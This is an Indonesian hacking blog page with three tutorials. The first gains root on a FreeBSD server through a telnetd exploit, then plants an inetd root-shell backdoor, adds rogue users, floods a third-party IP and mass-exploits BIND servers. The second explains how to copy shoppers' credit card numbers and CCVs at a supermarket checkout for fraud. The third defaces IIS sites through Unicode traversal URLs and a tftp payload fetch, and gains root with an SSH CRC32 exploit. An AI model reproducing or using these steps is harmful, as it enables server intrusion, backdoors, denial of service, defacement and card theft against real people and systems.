Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

3

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

mp3 Player

Efek klik kanan

Rabu, 30 Maret 2016

Hacking Root dan Pembuatan Backdoor 

                                                                                                    
 - hey hey hey para pengguna scriptz, mungkinz kalianz sudah terbiasa dalam hal mendapatkan  akses setingkat root di box online yang kalianz attact, dan pasti untuk membawa nama comunity atau nama sendiri kalian coba untuk melakukan defacing. ehmm...udah puaskah hanya denganz defacing doang..?? no i don't think so..uh !! mungkin aku ndiri dulu suka banget yang namanya defacing, truz di kabarkan kemana-mana kalo kita berhasil breaking security box online tersebut.

Tapi aku pengen curhatz dikitz keisengan aku saat ngedapetinz box online. Sekarang aku pengenz coba make scriptz yang ada, misal coba ke box bsd ajah yah, ambil contoh free-bsd, inih misal loh, janganz protez kalo yang ngerasa hal inih menjijikanz mah yah...pliz pliz pliz...

Alat yang bisa di siapkan :

1. shell-unix kalianz.
2. script buat attackingnyah, dalam hal inih aku coba telnetd-bsd.c
3. marlboro light, bagi kalianz yang merokok. Haruz marlboro light, hehehe... *kiddingz*
4. coklatz cadburyz, es milo, mp3-player, MIrc-clientz, Yahoo-messenger... hihihi buatz ngilanginz suntukz ajah kok.
5. your brain ofcourse.

Ok pas kita dapet target, kita coba test apakah mreka vulnerable atau tidak dengan cara sbb:

[root@purepero .bash]# ./FAKE httpd ./tel -c ns.kuaiqu.com 7350854 - x86/bsd telnetd remote root by zip, lorian, smiler and scut.
check: PASSED, using 16mb mode


Ternyata vulner euy..hihihi, kita coba breaking ajah yukz pake brute force..!!

[root@purepero .bash]# ./FAKE httpd ./tel -f ns.kuaiqu.com 7350854 - x86/bsd telnetd remote root by zip, lorian, smiler and scut.
check: PASSED, using 16mb mode

#################################

ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then, there is no other way, sorry...




## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots ;)
percent |--------------------------------------------------------| ETA |

99.37% |....................................................... | 00:00:16 | ## sleeping for 10 seconds to let the process recover ## ok, you should now have a root shell ## as always, after hard times, there is a reward...

command: ÿý%uname -a ; id ; hostname

FreeBSD ns.kuaiqu.com 4.2-RELEASE FreeBSD 4.2-RELEASE #0: Thu Dec 21 23:24:49 CST 2000 awa@ns.kuaiqu.com:/usr/src/sys/compile/KUAIQU i386

uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) ns.kuaiqu.com




Hoooaaammmm.... akhirnyah nembuz juga dah.. mo deface? hihihihi, ah nakalz banget seeh, kita coba cara yang jahatz yuk ..!! kita bikinz backdoor ajah duluw. Oh iya, aku coba pake backdoor port ajah, walau gak smua comand shell bisa di lakukan, tapi untuk ngejalanin script-script nakalz bisa kok...

isengz bikinz backdoor :



ps ax | grep inetd
ps: warning: /var/run/dev.db: No such file or directory
135 ?? Is 0:02.24 inetd -wW
72448 ?? Is 0:00.29 /usr/sbin/inetd -wW
79721 ?? Is 0:00.27 /usr/sbin/inetd --help
echo "semutz 12342/tcp" >> /etc/services
echo "dial stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf kill -HUP 135



wah dah jadi dah backdoor kita, coba ajah skarangz telnet ke target sesuai port yang kalianz add tadi, yaitu port 12342. Nama service ama port bisa kalianz ganti sesuai keinginanz kalianz kok. Oh iya, untuk upload file-file scriptz kalianz kan butuh user di box tersebut, kalo aku biasanyah adduser atawa ganti name user+passwd user yang udah ada..hihihi...
kalo mo adduser :

pw useradd -g whell -d /home/semutz -s /usr/local/bin/tcsh
atau

pw useradd semutz

kalo mo ganti name user+passwd-nyah :

pw usermod erica -l semutz

passwd semutz




Untuk lengkapnya coba baca manualnyah di /etc/adduser.conf ajah yah untuk free-bsd..hehe.. nah setelah selesai, buruan upload script/tool nakal kalianz ke user tadi, dan compile secepatnyah..[haruz kurangz dari 10 menit] kalo udah berharap sajah semoga user name yang kalianz add/ganti tadi gak di ketahui ama si empunya box.. kalo misalnyah terhapuz, kalianz masih bisa login lewat backdoor yang kalianz add tadi. Ok misal kalianz mo coba akses lewat backdoor, coba telnet ke backdoor yang di add tadi :

[root@purepero /]# telnet ns.kuaiqu.com 12342 Trying 202.106.127.106... Connected to ns.kuaiqu.com. Escape character is '^]'.
sh: can't access tty; job control turned off

# id ; uname -a ; hostname ;

uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)

FreeBSD ns.kuaiqu.com 4.2-RELEASE FreeBSD 4.2-RELEASE #0: Thu Dec 21 23:24:49 CST 2000 awa@ns.kuaiqu.com:/usr/src/sys/compile/KUAIQU i386

ns.kuaiqu.com

: not found

#


dan skarangz coba ajah jalaninz script/tool nakal kalianz, misal ajah aku mo coba isengz kirim packet ke IP musuh...hihihi, btw aku gak cari musuh loh, inih

cumanz isengz doang kok.. aku coba jalankan ajah scriptz-nyah : # ./FAKE httpd ./tembak 202.95.156.178 ;

--------------------------------------------
packetkiddies eh??
--------------------------------------------

nya mana? ngga ada sasarannya tuh mas..

: not found
#
# ./FAKE httpd ./tembak -h 202.95.156.178 ;
--------------------------------------------
packetkiddies eh??
--------------------------------------------

SIAP!!!! PASUKANNNNN!!! TEMBAK 202.95.156.178 di port 22
SIAPIN pelornya 45

^C

#




nah udah launched deh paketnyah, kebetulan yang aku pake inih dia kirim 2 Mb tiap sending secara default, kecil kok, gak ngrusak..hihi..tapi yang barusan aku lakukan timing-nyah gak terhingga, jadi kirim secara terus menerus. Lalu coba deh ping IP tadi lewat dos atawa lewat shell unix kalianz, gimana hasilnyah? dan misal dia ada di IRC, liatz sajah quit msg dia...hihihi.. Oh iya, kalo udah selesey isengnyah tekan ajah Ctrl+c, hal inih berguna untuk menghindari packet yang berlebihan dan eksistensi rooted box kalianz. Ada juga script yang bisa sending seluruh bandwidth yang di punyai box online tersebut, kalianz bisa cari di internet banyak kok.

Mo coba jalaninz script lainnyah..?? bisa juga kok, coba ajah jalanin mass-attacking bind, statdx, lpd, atau wuftpd. yang mo aku coba skarangz mass-attacking bind deh :

# ./FAKE httpd ./luckscan-a --help ;
Usage: ./luckscan-a <a-block> <port> [b-block] [c-block]

: not found

# ./FAKE httpd ./luckscan-a 211 53 159 ;
We are trying to root the server 211.194.27.227
Version ...
Moving onto another server...
We are trying to root the server 211.194.44.230
Version ...
Moving onto another server...
We are trying to root the server 211.194.81.2
Version 8.1.2 ... frame ptr=0xbffff800 adr=bffff64e ofs=102 port=05f8 connected! sent!




nah pas kalianz dapatkan promt sepertih inih, coba tekan <enter> 2x lalu 'uname -a ; id ; hostname' apa yang kalianz lihatz ? hihihi... ya udah kerja lagih sanah, mo adduser, backdoor, rename user+passwd, defacing, eggdrop, psybnc atau yang laennyah terserah..hihihi.. kalo dah ngerasa puas di box baru inih, tekan sajah Ctrl+c, dan mass-attacking tadi jalan kembali sebagai mana mestinyah...

We are trying to root the server 211.194.119.2
Version ...
Moving onto another server...
We are trying to root the server 211.194.140.2
Version 8.2.3-REL ...
Moving onto another server...
We are trying to root the server 211.194.144.241
Version 8.1.2 ... system cannot be exploited
Moving onto another server...
We are trying to root the server 211.194.157.19
Version 8.2.2-P5 ... system does not seem to be a vulnerable linux Moving onto another server... We are trying to root the server 211.196.70.155 Version 8.1.2 ... frame ptr=0xbffffc00 adr=bffffa7e ofs=54 port=1043 connected! sent!




    hooaaammm...dapet lagih...sialanz, kerja lagih dah...hihihi.. Ok udah gituh dulu ajah, silakanz coba coba ajah sendiri. Oh iya, pasti ada yang tanya, kenap aku pake faked httpd buat jalaninz scriptz...hehehhe, soale ituh bukanz box aku, jadi kudu tersamarkan aktipitasku, kalo gak mah, bisa kena kill kita atau gak gak awet dah box-nyah.. Walah, kok malah ngajarinz nakalz yakz.. yang jelas inih artikelz harap di baca ama para admin ajah, kalo sebenernyah di box kalianz bisa terjadi apa sajah tanpa sepengetahuanz kalianz... *watch out*


daaaaagghhhh...

nb:

1. Moga ajah inih cuman sebagai teman ber-internet kalian ajah, jangan di coba kalo gak mau nanggung resiko yang gak kalianz ketahuinz nantinyah.. dan kerjakanz dalam waktu secepat mungkinz. 2. Usahakan selalu berbagi sebisa kalianz bagi yang dah perfect. 3. Bagi para admin, sering seringlah check keberadaan trafic box anda. 4. Tanda ';' harus di ikut sertakan pada saat kalianz akses lewat backdoor port.

5. Aku nyedia-inz script buat mass-attacking bind, mass-attacking statdx, ama mass-attacking lpd doangz, yang laennyah mohon maap sebelomnyah gak boleh di distribusikan, harap di mengerti.

6. Bagi yang mau tanya lebih lanjut bisa kalianz tanyakanz ke aku atawa anak anak di #indosniffing, kita sudah jarang defacing karena lebih menyukai mempelajari isi dari OS-nya, karena kemungkinan kecil instal OS-nya di kost makanyah aku belajar dari box online hasil isengz ajah..hihihi...

7. PALING PENTINGZ KALIANZ PELAJARINZ SELUK BELUK OS YANG KALIANZ MO ATTACK DULU, AGAR TIDAK KESUSAHAN PAS KALIANZ MENDAPATKAN BOX ONLINE YANG SECURITY-NYAH LEMAH !!!!!!!!!!

terimakasih aku buat:
- #indosniffing, kalianz bukanz hanya temanz chating, tapi kalianz nganggep smua keluarga dan gak ada beda, aku suka ituh.
- #indofreebsd, #indolinux, #deface-team, #b@yochatz, #britishroom, #jasakom #sunsolaris
- vokalisku yunni, marlboro light, cadburyz, aqua, mp3 list-ku, mba'ku [tanti, dinda, naddya, ayi, yuli], komputerku si kompi.
- yang jelaz smuanyah yang udah nemeninz aku sejak lahir ampe skarangz ini ...hihihi..kayak say thx di cover kaset yakz..
- makasih juga buatz *** Resolved 148.223.110.67 to customer-148-223-110-67.uninet.net.mx yang udah ngasih ijinz aku akses root di box anda ... hihihihi...

script mass-attacking bisa di lihatz di :

- http://www.rocketpunch-ent.com/masslpd.tar, http://www.rocketpunch-ent.com/bindscan.c, http://www.rocketpunch-ent.com/lucstatdx.c



CCFresh

Mendapatkan CC Fresh dengan mudah 


- Tulisan ini dibuat setelah melihat banyaknya minat dari para pemula yang ingin belajar dan kelemahan yang ada yang membuat hal ini di mungkinkan.


Sekitar setahun yang lalu ketika akan membayar barang belanja diHypermarket "Carrefour" saya terperangah melihat gampangnya mendapatkan nomor kartukredit yang fresh berikut ccv-nya sehingga diputuskan untuk membayar belanjaan dengan uang cash.

Begini caranya :
1. Biasakan menghafal 8 digit nomor untuk memudahkan mengingat

2. 8 digit pertama dari sebuah kartukredit [visa/master] dari bank yang sama adalah sama. 
Contoh : Kartukredit Citibank Visa 4541 7900 **** ****

3. CCV adalah security number yang tercetak dibelakang kartukredit
contoh : Citibank Visa 4541 7900 **** **** 123

4. Jangan lupa masa aktif kartu tersebut Bulan/Tahun
contoh : 08/05

5. Juga nama lengkap yang tercetak dikartu
contoh : M.suhendarsyah

6. Antrilah dibelakang seseorang yang mempunyai banyak barang belanjaan. Karena biasanya
menggunakan kartu kredit untuk pembayarannya

7. Jangan terlalu mencolok untuk berusaha melihat informasi dari kartukredit tersebut
Karena biasanya untuk transaksi dengan kartukredit membutuhkan waktu sekitar 1 menit,
apabila jaringannya tidak terlalu sibuk.

8. Sesaat setelah kasir menggesek kartu biasanya akan melihat kartu tersebut, disitulah kesempatan.
setelah transaksi diApprove tulis informasi dengan pulpen agar tidak lupa

9. Apabila belum berhasil....coba lagi esok hari atau ingat Jenis kartu,bank penerbit dan 8 digit pertama

10. Sukses....! bikin account di Paypal ....siap digunakan untuk Online gambling, Membeli software dll

Beberapa hari yang lalu dites kembali dan hasilnya masih seperti yang diharapkan.........Email account yang digunakan untuk online shopping akan dihapus apabila ada komplain dari sebuah situs yang kita coba..........dijamin berhasil !
Tolong jangan email minta nomornya.................................. untuk kasir "Carrefour" agar lebih waspada lagi




Deface_NT_Web

DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu : 1. IIS (server untuk microsoft, dkk) 2. Unix(linux,BSD,IRIX,SOLARIS,dsb) Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya : ~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~ ------------------------------------------------------------- Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser. OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh.. setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh: http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ Ada dua kemungkinan yang tampil pada browser Anda yaitu: Kahiji : Muncul pesan ERROR ... Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka www.targethost.com tadi ada kemungkinan untuk bisa kita deface... Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu : • Bagian host, yaitu "http://www.targethost.com" • Bagian exploit string, yaitu "/scripts/..%255c..%255c" • Bagian folder, yaitu "/winnt/system32/" • Bagian command, yaitu "cmd.exe?/c+dir+c:\" Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\" atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all" Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah : - /cgi-bin/..%255c..%255c - /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af.. - /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. - /scripts/..%255c..%255c Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe). Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,, index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??... Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah : http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah..... truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window.... http://www.targethost.com == neh yg ini......di situ kan alias di http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada : Directory of C:\InetPub\wwwroot 07/20/01 03:21p 1,590 default.htm 07/20/01 03:21p 590 index.html 07/20/01 03:21p 3,453 main.html Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah... contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya : http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html Lihat apa yg terjadi di IE kitaa CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Access is denied Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan?? CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are : Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnyah*) Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO.. Kedua lewat TFTP32. *Cara pertama :* Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe . Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut : http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe Pasti hasilnya akan seperti di bawah ini : CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are : 1 file(s) copied. Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file. Okeih beBb skrg mari kita up-load file nya lewat perintah echo perintahnya : http://www.targethost.com/scripts/..%255c..%255ccmdku.exe?/c+echo+"..::DeFaCinG by : aku::....::DeFacEd By : ME::..
HacKeD by : ME
ThX tO ALL crew in %23cracxer oN IRC DALNET
NO THX TO :pak-tani
"+>+ C:\InetPub\wwwroot\main.html Kita liat apa yg terjadi di IE kita. CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are : Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian : * Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c * Bagian command yaitu, cmdku.exe?/c+echo+ * Bagian HTML yaitu, ..::DeFaCinG by : aku::....::DeFacEd By : ME::..
HacKeD by : ME
ThX tO ALL crew in %23cracxer oN IRC DALNETNO THX TO :pak-tani
"+>+ * Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu, C:\InetPub\wwwroot\main.html *Cara kedua:* Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya : http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:\InetPub\wwwroot\main.html Kita liat lagi apa yg terjadi di IE kita. CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are : Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi. Sayah akan uraikan juga URL tadee menjadi 4 bagian : * Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c * Bagian folder, yaitu /winnt/system32/ * Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ * Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu, C:\InetPub\wwwroot\main.html Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee. Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini. --------------------------------------------END-------------------------------------------------- Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground...hehehehe "yang kreatif donk..!!" Okeh sekrang kita ke UNIX yah...di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian "Hacking Shell"). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit "SSH CRC32 Exploit", exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1. Ketika berjalan exploitnya akan bekerja seperti ini : [root@juventini]# ./x10 -t1 192.168.1.120 password: Target: Small - SSH-1.5-1.2.26 Attacking: 192.168.1.120:22 Testing if remote sshd is vulnerable # ATTACH NOWYES # Finding h - buf distance (estimate) (1 ) testing 0x00000004 # SEGV # (2 ) testing 0x0000c804 # FOUND # Found buffer, determining exact diff Finding h - buf distance using the teso method (3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV # (4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED # (5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED # (6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SEGV # (7 ) binary-search: h: 0x083f9ffc, slider: 0x00000800 # SEGV # (8 ) binary-search: h: 0x083f9bfc, slider: 0x00000400 # SEGV # (9 ) binary-search: h: 0x083f99fc, slider: 0x00000200 # SURVIVED # (10) binary-search: h: 0x083f9afc, slider: 0x00000100 # SEGV # (11) binary-search: h: 0x083f9a7c, slider: 0x00000080 # SEGV # (12) binary-search: h: 0x083f9a3c, slider: 0x00000040 # SEGV # (13) binary-search: h: 0x083f9a1c, slider: 0x00000020 # SEGV # (14) binary-search: h: 0x083f9a0c, slider: 0x00000010 # SURVIVED # (15) binary-search: h: 0x083f9a14, slider: 0x00000008 # SURVIVED # Bin search done, testing result Finding exact h - buf distance (16) trying: 0x083f9a14 # SURVIVED # Exact match found at: 0x000065ec Looking for exact buffer address Finding exact buffer address (17) Trying: 0x080865ec # SURVIVED # Finding distance till stack buffer (18) Trying: 0xb7f81400 # SEGV # (19) Trying: 0xb7f81054 # SEGV # (20) Trying: 0xb7f80ca8 # SEGV # (21) Trying: 0xb7f808fc # SEGV # (22) Trying: 0xb7f80550 # SEGV # (23) Trying: 0xb7f801a4 # SEGV # (24) Trying: 0xb7f7fdf8 # SEGV # (25) Trying: 0xb7f7fa4c # SEGV # (26) Trying: 0xb7f7f6a0 # SEGV # (27) Trying: 0xb7f7f2f4 # SEGV # (28) Trying: 0xb7f7ef48 # SEGV # (29) Trying: 0xb7f7eb9c # SEGV # (30) Trying: 0xb7f7e7f0 # SEGV # (31) Trying: 0xb7f7e444 # SEGV # (32) Trying: 0xb7f7e098 # SURVIVED # verifying (33) Trying: 0xb7f7e098 # SEGV # OK Finding exact h - stack_buf distance (34) trying: 0xb7f7de98 slider: 0x0200# SURVIVED # (35) trying: 0xb7f7dd98 slider: 0x0100# SURVIVED # (36) trying: 0xb7f7dd18 slider: 0x0080# SEGV # (37) trying: 0xb7f7dd58 slider: 0x0040# SEGV # (38) trying: 0xb7f7dd78 slider: 0x0020# SURVIVED # (39) trying: 0xb7f7dd68 slider: 0x0010# SEGV # (40) trying: 0xb7f7dd70 slider: 0x0008# SEGV # (41) trying: 0xb7f7dd74 slider: 0x0004# SURVIVED # (42) trying: 0xb7f7dd72 slider: 0x0002# SEGV # Final stack_dist: 0xb7f7dd74 EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfa ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 Crash, finding next return address Changing MSW of return address to: 0x080a Crash, finding next return address EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcf6 ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 Crash, finding next return address Changing MSW of return address to: 0x080a Crash, finding next return address EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfc ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 No Crash, might have worked Reply from remote: CHRIS CHRIS ***** YOU ARE IN ***** localhost.localdomain Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) .....HOREEEEE...dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu...untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh...gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru...;)), gini caranya : 1. ganti dulu nama indexnyamv index.htm oldindex.htm 2. sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm 3. masukan HTML yang kalian buat di vi ataupun pico tadi 4. buka browser kalian....heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!! Gitu aja kok caranya...mudah aja kan..?? hehehhe...intinya memang cuman bagaimana mendapatkan fasilitas root pada 